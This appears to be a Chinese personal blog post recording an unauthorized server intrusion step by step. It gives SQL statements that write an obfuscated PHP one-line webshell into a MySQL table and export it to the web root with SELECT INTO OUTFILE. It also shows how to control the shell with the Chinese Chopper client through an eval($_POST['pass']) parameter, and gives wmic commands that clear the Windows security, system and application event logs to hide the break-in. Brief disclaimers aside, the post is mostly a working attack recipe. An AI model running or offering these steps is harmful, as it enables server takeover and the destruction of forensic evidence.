好吧,记录一下一次服务器提权的过程吧

###切记千万不要学里面的东西，这只是我留档备份作为思考用的，不是正道！###
首先拿到mysql的root帐号和密码,然后破解了phpmyadmin路径
然后进去用了一些办法,首先
创建一个表

create table tmp(str TEXT);

然后写PHP一句话

insert into tmp values("<?");
insert into tmp values("$_=\"\";");
insert into tmp values("$_[+\"\"]='';");
insert into tmp values("$_=\"$_\".\"\";");
insert into tmp values('$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");');
insert into tmp values("?>");
insert into tmp values("<?=${'_'.$_}['_'](${'_'.$_}['__']);?>");

好,然后通过X2的UC来爆路径,访问xxxx/uc_server/control/admin/db.php
然后生成一句话文件

select * from tmp into outfile "d:\\xx\\xx\\onesentence.php";

然后用菜刀工具http://www.maicaidao.com/
caidao-20111116.zip
添加这个站点时,地址就是文件的访问地址/onesentence.php?_=assert&__=eval($_POST[‘pass’]),密码是pass
然后就可以用这个来控制机器咯,嗯.
忽然发现我竟然做了一次HACKER,难以置信了,嗯.
吐槽:不过违法的事还是少做吧,嗯…
擦屁股,清空日志:
cmd命令如下,用PHP后门来处理

wmic nteventlog where (description like \"%secevent%\") call cleareventlog
wmic nteventlog where (description like \"%sysevent%\") call cleareventlog
wmic nteventlog where (description like \"%appevent%\") call cleareventlog